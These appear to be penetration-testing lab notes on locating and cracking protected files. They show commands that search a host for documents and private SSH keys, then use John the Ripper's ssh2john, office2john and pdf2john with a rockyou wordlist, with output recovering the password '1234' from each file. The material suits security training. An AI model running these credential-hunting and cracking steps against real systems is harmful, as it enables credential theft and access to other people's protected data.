Protected Files

Hunting for Files

cryanight@unixclient:~$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

File extension:  .xls

File extension:  .xls*

File extension:  .xltx

File extension:  .csv
/home/cryanight/Docs/client-emails.csv
/home/cryanight/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header-label.csv
/home/cryanight/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header.csv
/home/cryanight/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/no-header.csv
/home/cryanight/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/plus.csv
/home/cryanight/ruby-2.7.3/test/win32ole/orig_data.csv

File extension:  .od*
/home/cryanight/Docs/document-temp.odt
/home/cryanight/Docs/product-improvements.odp
/home/cryanight/Docs/mgmt-spreadsheet.ods
...SNIP...

Hunting for SSH Keys

cryanight@unixclient:~$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

/home/cryanight/.ssh/internal_db:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cryanight/.ssh/SSH.private:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cryanight/Mgmt/ceil.key:1:-----BEGIN OPENSSH PRIVATE KEY-----

---

Cracking with John

John Hashing Scripts

neutron@kali[/kali]$ locate *2john*

/usr/bin/bitlocker2john
/usr/bin/dmg2john
/usr/bin/gpg2john
/usr/bin/hccap2john
/usr/bin/keepass2john
/usr/bin/putty2john
/usr/bin/racf2john
/usr/bin/rar2john
/usr/bin/uaf2john
/usr/bin/vncpcap2john
/usr/bin/wlanhcx2john
/usr/bin/wpapcap2john
/usr/bin/zip2john
/usr/share/john/1password2john.py
/usr/share/john/7z2john.pl
/usr/share/john/DPAPImk2john.py
/usr/share/john/adxcsouf2john.py
/usr/share/john/aem2john.py
/usr/share/john/aix2john.pl
/usr/share/john/aix2john.py
/usr/share/john/andotp2john.py
/usr/share/john/androidbackup2john.py
...SNIP...

neutron@kali[/kali]$ ssh2john.py SSH.private > ssh.hash
neutron@kali[/kali]$ cat ssh.hash 

ssh.private:$sshng$0$8$1C258238FD2D6EB0$2352$f7b...SNIP...

Cracking SSH Keys

neutron@kali[/kali]$ john --wordlist=rockyou.txt ssh.hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
1234         (SSH.private)
1g 0:00:00:00 DONE (2022-02-08 03:03) 16.66g/s 1747Kp/s 1747Kc/s 1747KC/s Knightsing..Babying
Session completed

neutron@kali[/kali]$ john ssh.hash --show

SSH.private:1234

1 password hash cracked, 0 left

---

Cracking Documents

Cracking Microsoft Office Documents

neutron@kali[/kali]$ office2john.py Protected.docx > protected-docx.hash
neutron@kali[/kali]$ cat protected-docx.hash

Protected.docx:$office$*2007*20*128*16*7240...SNIP...8a69cf1*98242f4da37d916305d8e2821360773b7edc481b

neutron@kali[/kali]$ john --wordlist=rockyou.txt protected-docx.hash

Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234             (Protected.docx)
1g 0:00:00:00 DONE (2022-02-08 01:25) 2.083g/s 2266p/s 2266c/s 2266C/s trisha..heart
Use the "--show" option to display all of the cracked passwords reliably
Session completed

neutron@kali[/kali]$ john protected-docx.hash --show

Protected.docx:1234

Cracking PDFs

neutron@kali[/kali]$ pdf2john.py PDF.pdf > pdf.hash
neutron@kali[/kali]$ cat pdf.hash 

PDF.pdf:$pdf$2*3*128*-1028*1*16*7e88...SNIP...bd2*32*a72092...SNIP...0000*32*c48f001fdc79a030d718df5dbbdaad81d1f6fedec4a7b5cd980d64139edfcb7e

neutron@kali[/kali]$ john --wordlist=rockyou.txt pdf.hash

Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 3 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234             (PDF.pdf)
1g 0:00:00:00 DONE (2022-02-08 02:16) 25.00g/s 27200p/s 27200c/s 27200C/s bulldogs..heart
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed

neutron@kali[/kali]$ john pdf.hash --show

PDF.pdf:1234

1 password hash cracked, 0 left